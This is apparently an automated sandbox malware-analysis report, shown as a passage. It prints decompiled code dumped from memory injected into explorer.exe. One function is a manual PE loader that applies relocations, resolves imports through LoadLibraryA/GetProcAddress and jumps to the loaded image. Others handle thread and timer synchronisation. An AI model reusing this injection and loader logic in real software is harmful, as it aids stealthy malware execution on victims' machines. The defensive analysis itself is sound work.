                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						asm("sbb edi, edi");
                                          						_t271 =  ~_t269 & 0x00000002;
                                          						__eflags = _t271;
                                          						return _t271;
                                          					} else {
                                          						__eflags = _t218 - 4;
                                          						if(_t218 == 4) {
                                          							goto L34;
                                          						} else {
                                          							_t173 =  *_t272;
                                          							__eflags =  *(_t173 + 4);
                                          							if( *(_t173 + 4) != 0) {
                                          								goto L34;
                                          							} else {
                                          								_t88 = _t272 + 0x5c; // 0x84e85000
                                          								__eflags = _t254 -  *_t88;
                                          								if(_t254 !=  *_t88) {
                                          									goto L34;
                                          								} else {
                                          									return 1;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					return 3;
                                          				}
                                          			}
                                          0x000d2f18
                                          0x000d2f1b
                                          0x000d2f23
                                          0x000d2f28
                                          0x000d2f28
                                          0x000d2f2e
                                          0x000d2f31
                                          0x000d2f34
                                          0x000d2f37
                                          0x000d2f39
                                          0x000d2f39
                                          0x000d2f3a
                                          0x000d2f3a
                                          0x000d2f37
                                          0x000d2f48
                                          0x000d2f4b
                                          0x000d2f4f
                                          0x000d2f54
                                          0x000d2f57
                                          0x000d2f5a
                                          0x000d2f5a
                                          0x000d2f5a
                                          0x000d2f5d
                                          0x000d2f5d
                                          0x000d2f60
                                          0x000d2f60
                                          0x000d2ee1
                                          0x000d2ee1
                                          0x000d2ef1
                                          0x000d2ef4
                                          0x000d2ef9
                                          0x000d2ef9
                                          0x000d2efc
                                          0x000d2eff
                                          0x000d2f02
                                          0x000d2f04
                                          0x000d2f04
                                          0x000d2f63
                                          0x000d2f65
                                          0x000d2f68
                                          0x000d2f68
                                          0x000d2f6e
                                          0x000d2f72
                                          0x000d2f75
                                          0x000d2f77
                                          0x000d2f77
                                          0x000d2f88
                                          0x000d2f8a
                                          0x000d2f8a
                                          0x000d2f92
                                          0x000d2fa0
                                          0x000d2fa3
                                          0x000d2fa5
                                          0x000d2fc5
                                          0x000d2fc5
                                          0x000d2fc8
                                          0x000d2fce
                                          0x000d2fcf
                                          0x000d2fd2
                                          0x000d2fd4
                                          0x000d2fd7
                                          0x000d2fda
                                          0x000d2fdd
                                          0x000d2fe1
                                          0x000d2fe4
                                          0x000d2fe7
                                          0x000d2fea
                                          0x000d2fec
                                          0x000d2fec
                                          0x000d2fef
                                          0x000d2ff1
                                          0x000d2ff1
                                          0x000d2ff4
                                          0x000d2ff6
                                          0x000d2ff9
                                          0x000d3001
                                          0x000d3004
                                          0x000d3009
                                          0x000d3009
                                          0x000d300f
                                          0x000d3012
                                          0x000d3015
                                          0x000d3017
                                          0x000d3017
                                          0x000d3018
                                          0x000d3018
                                          0x000d3023
                                          0x000d3023
                                          0x000d3023
                                          0x000d3026
                                          0x000d3029
                                          0x000d3029
                                          0x000d302c
                                          0x000d302c
                                          0x000d2fef
                                          0x000d302f
                                          0x000d3032
                                          0x000d3035
                                          0x000d3037
                                          0x000d303a
                                          0x000d303c
                                          0x000d303f
                                          0x000d3042
                                          0x000d3044
                                          0x000d3047
                                          0x000d304f
                                          0x000d3057
                                          0x000d305a
                                          0x000d305a
                                          0x000d305a
                                          0x000d305d
                                          0x000d305d
                                          0x000d305d
                                          0x000d3060
                                          0x000d3066
                                          0x000d3068
                                          0x000d3068
                                          0x000d306e
                                          0x000d3074
                                          0x000d307d
                                          0x000d3084
                                          0x000d3086
                                          0x000d3089
                                          0x000d3089
                                          0x000d308c
                                          0x000d308c
                                          0x000d308f
                                          0x000d3091
                                          0x000d3094
                                          0x000d3096
                                          0x000d30b1
                                          0x000d30b1
                                          0x000d30b5
                                          0x000d30b8
                                          0x000d30bb
                                          0x000d30be
                                          0x000d30d4
                                          0x000d30d4
                                          0x000d30d4
                                          0x000d30c0
                                          0x000d30c0
                                          0x000d30c2
                                          0x000d30c6
                                          0x000d30c9
                                          0x00000000
                                          0x000d30cb
                                          0x000d30cb
                                          0x000d30cd
                                          0x00000000
                                          0x000d30cf
                                          0x000d30cf
                                          0x000d30cf
                                          0x000d30cd
                                          0x000d30c9
                                          0x000d30d8
                                          0x000d30db
                                          0x000d30e0
                                          0x000d30ea
                                          0x000d30ea
                                          0x000d30ea
                                          0x000d30ed
                                          0x000d3098
                                          0x000d3098
                                          0x000d309a
                                          0x000d30a1
                                          0x000d30a1
                                          0x000d30a3
                                          0x000d30a5
                                          0x000d30a7
                                          0x000d30ab
                                          0x000d30ad
                                          0x000d30af
                                          0x00000000
                                          0x00000000
                                          0x000d30af
                                          0x000d30ab
                                          0x000d309c
                                          0x000d309c
                                          0x000d309f
                                          0x00000000
                                          0x00000000
                                          0x000d309f
                                          0x000d309a
                                          0x000d30f7
                                          0x000d30f9
                                          0x000d30f9
                                          0x000d3104
                                          0x000d2fa7
                                          0x000d2fa7
                                          0x000d2faa
                                          0x00000000
                                          0x000d2fac
                                          0x000d2fac
                                          0x000d2fae
                                          0x000d2fb2
                                          0x00000000
                                          0x000d2fb4
                                          0x000d2fb4
                                          0x000d2fb4
                                          0x000d2fb7
                                          0x00000000
                                          0x000d2fbb
                                          0x000d2fc4
                                          0x000d2fc4
                                          0x000d2fb7
                                          0x000d2fb2
                                          0x000d2faa
                                          0x000d2f96
                                          0x000d2f9f
                                          0x000d2f9f

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
                                          • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				signed int _v5;
                                          				signed short _v12;
                                          				intOrPtr* _v16;
                                          				signed int* _v20;
                                          				intOrPtr _v24;
                                          				unsigned int _v28;
                                          				signed short* _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr* _v40;
                                          				signed short* _v44;
                                          				intOrPtr _v48;
                                          				unsigned int _v52;
                                          				intOrPtr _v56;
                                          				_Unknown_base(*)()* _v60;
                                          				signed int _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				unsigned int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				signed int _t149;
                                          				void* _t189;
                                          				signed int _t194;
                                          				signed int _t196;
                                          				intOrPtr _t236;
                                          
                                          				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          				_v24 = _v72;
                                          				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                          				_v56 = _t236;
                                          				if(_t236 == 0) {
                                          					L13:
                                          					while(0 != 0) {
                                          					}
                                          					_push(8);
                                          					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                          						L35:
                                          						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                          						while(0 != 0) {
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_a12 = _v68;
                                          						}
                                          						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                          						return _v68(_a4, 1, _a8);
                                          					}
                                          					_v84 = 0x80000000;
                                          					_t149 = 8;
                                          					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                          						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						if(_v36 == 0) {
                                          							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						}
                                          						if(_v36 != 0) {
                                          							if( *_v16 == 0) {
                                          								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                          							} else {
                                          								_v20 =  *_v16 + _a4;
                                          							}
                                          							_v64 = _v64 & 0x00000000;
                                          							while( *_v20 != 0) {
                                          								if(( *_v20 & _v84) == 0) {
                                          									_v88 =  *_v20 + _a4;
                                          									_v60 = GetProcAddress(_v36, _v88 + 2);
                                          								} else {
                                          									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                          								}
                                          								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                          									 *_v20 = _v60;
                                          								} else {
                                          									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                          								}
                                          								_v20 =  &(_v20[1]);
                                          								_v64 = _v64 + 4;
                                          							}
                                          							_v16 = _v16 + 0x14;
                                          							continue;
                                          						} else {
                                          							_t189 = 0xfffffffd;
                                          							return _t189;
                                          						}
                                          					}
                                          					goto L35;
                                          				}
                                          				_t194 = 8;
                                          				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                          				_t196 = 8;
                                          				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                          				while(0 != 0) {
                                          				}
                                          				while(_v48 > 0) {
                                          					_v28 = _v44[2];
                                          					_v48 = _v48 - _v28;
                                          					_v28 = _v28 - 8;
                                          					_v28 = _v28 >> 1;
                                          					_v32 =  &(_v44[4]);
                                          					_v80 = _a4 +  *_v44;
                                          					_v52 = _v28;
                                          					while(1) {
                                          						_v76 = _v52;
                                          						_v52 = _v52 - 1;
                                          						if(_v76 == 0) {
                                          							break;
                                          						}
                                          						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                          						_v12 =  *_v32 & 0xfff;
                                          						_v40 = (_v12 & 0x0000ffff) + _v80;
                                          						if((_v5 & 0x000000ff) != 3) {
                                          							if((_v5 & 0x000000ff) == 0xa) {
                                          								 *_v40 =  *_v40 + _v56;
                                          							}
                                          						} else {
                                          							 *_v40 =  *_v40 + _v56;
                                          						}
                                          						_v32 =  &(_v32[1]);
                                          					}
                                          					_v44 = _v32;
                                          				}
                                          				goto L13;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
                                          • LoadLibraryA.KERNEL32(?), ref: 000D2C65
                                          • GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 384173800-0
                                          • Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
                                          • Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
                                          • Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
                                          • Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _t13;
                                          				intOrPtr _t15;
                                          				signed int _t16;
                                          				intOrPtr _t17;
                                          				signed int _t18;
                                          				char _t20;
                                          				intOrPtr _t22;
                                          				void* _t23;
                                          				void* _t24;
                                          				intOrPtr _t29;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t43;
                                          				intOrPtr _t48;
                                          				void* _t51;
                                          				signed int _t61;
                                          				signed int _t64;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t61 = __ecx;
                                          				_t41 =  *0xde6dc; // 0x1e8
                                          				_t13 = E000CA4BF(_t41, 0);
                                          				while(_t13 < 0) {
                                          					E000C980C( &_v28);
                                          					_t43 =  *0xde6e0; // 0x0
                                          					_t15 =  *0xde6e4; // 0x0
                                          					_t41 = _t43 + 0xe10;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t15 - _v24;
                                          					if(__eflags > 0) {
                                          						L9:
                                          						_t16 = 0xfffffffe;
                                          						L13:
                                          						return _t16;
                                          					}
                                          					if(__eflags < 0) {
                                          						L4:
                                          						_t17 =  *0xde684; // 0x14cf8f0
                                          						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
                                          						__eflags = _t18;
                                          						if(_t18 == 0) {
                                          							break;
                                          						}
                                          						_t35 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                          						_t41 =  *0xde6dc; // 0x1e8
                                          						__eflags = 0;
                                          						_t13 = E000CA4BF(_t41, 0);
                                          						continue;
                                          					}
                                          					__eflags = _t41 - _v28;
                                          					if(_t41 >= _v28) {
                                          						goto L9;
                                          					}
                                          					goto L4;
                                          				}
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t20 =  *0xde6e8; // 0x14cfdb8
                                          				_v28 = _t20;
                                          				_t22 = E000CA6A9(_t41, _t61,  &_v16);
                                          				_v20 = _t22;
                                          				if(_t22 != 0) {
                                          					_t23 = GetCurrentProcess();
                                          					_t24 = GetCurrentThread();
                                          					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
                                          					E000C980C(0xde6e0);
                                          					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
                                          					__eflags = _t64;
                                          					if(_t64 >= 0) {
                                          						_push(0);
                                          						_push( *0xde760);
                                          						_t51 = 0x27;
                                          						E000C9F06(_t51);
                                          					}
                                          				} else {
                                          					_t64 = _t61 | 0xffffffff;
                                          				}
                                          				_t29 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
                                          				_t48 =  *0xde6dc; // 0x1e8
                                          				 *0xde6d0 = 0;
                                          				E000CA4DB(_t48);
                                          				E000C861A( &_v24, 0);
                                          				_t16 = _t64;
                                          				goto L13;
                                          			}

                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fcca7391820195f4f259866b6a38c60cc864deeab22be1a77c0a141bdab91468
                                          • Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
                                          • Opcode Fuzzy Hash: fcca7391820195f4f259866b6a38c60cc864deeab22be1a77c0a141bdab91468
                                          • Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E000C1B2D(void* __eflags, void* __fp0) {
                                          				char _v24;
                                          				char _v28;
                                          				void* _t12;
                                          				intOrPtr _t14;
                                          				void* _t15;
                                          				intOrPtr _t16;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				char _t24;
                                          				intOrPtr _t26;
                                          				intOrPtr _t28;
                                          				intOrPtr _t33;
                                          				intOrPtr _t38;
                                          				intOrPtr _t40;
                                          				void* _t41;
                                          				intOrPtr _t46;
                                          				void* _t48;
                                          				intOrPtr _t51;
                                          				void* _t61;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t38 =  *0xde6f4; // 0x1e4
                                          				_t12 = E000CA4BF(_t38, 0);
                                          				while(_t12 < 0) {
                                          					E000C980C( &_v28);
                                          					_t40 =  *0xde700; // 0x0
                                          					_t14 =  *0xde704; // 0x0
                                          					_t41 = _t40 + 0x3840;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t14 - _v24;
                                          					if(__eflags > 0) {
                                          						L13:
                                          						_t15 = 0;
                                          					} else {
                                          						if(__eflags < 0) {
                                          							L4:
                                          							_t16 =  *0xde684; // 0x14cf8f0
                                          							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
                                          							__eflags = _t17;
                                          							if(_t17 == 0) {
                                          								break;
                                          							} else {
                                          								_t33 =  *0xde684; // 0x14cf8f0
                                          								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                          								_t51 =  *0xde6f4; // 0x1e4
                                          								__eflags = 0;
                                          								_t12 = E000CA4BF(_t51, 0);
                                          								continue;
                                          							}
                                          						} else {
                                          							__eflags = _t41 - _v28;
                                          							if(_t41 >= _v28) {
                                          								goto L13;
                                          							} else {
                                          								goto L4;
                                          							}
                                          						}
                                          					}
                                          					L12:
                                          					return _t15;
                                          				}
                                          				E000C980C(0xde700);
                                          				_t19 = GetCurrentProcess();
                                          				_t20 = GetCurrentThread();
                                          				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t24 =  *0xde6e8; // 0x14cfdb8
                                          				_v28 = _t24;
                                          				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
                                          				if(_t61 >= 0) {
                                          					_push(0);
                                          					_push( *0xde760);
                                          					_t48 = 0x27;
                                          					E000C9F06(_t48);
                                          				}
                                          				if(_v24 != 0) {
                                          					E000C6890( &_v24);
                                          				}
                                          				_t26 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
                                          				_t28 =  *0xde758; // 0x0
                                          				 *0xde6ec = 0;
                                          				_t29 =  !=  ? 1 : _t28;
                                          				_t46 =  *0xde6f4; // 0x1e4
                                          				 *0xde758 =  !=  ? 1 : _t28;
                                          				E000CA4DB(_t46);
                                          				_t15 = _t61;
                                          				goto L12;
                                          			}

                                          APIs
                                          • GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
                                          • GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
                                          • DuplicateHandle.KERNEL32 ref: 000C1BD9
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Current$Process$DuplicateHandleThread
                                          • String ID:
                                          • API String ID: 3566409357-0
                                          • Opcode ID: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
                                          • Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
                                          • Opcode Fuzzy Hash: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
                                          • Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%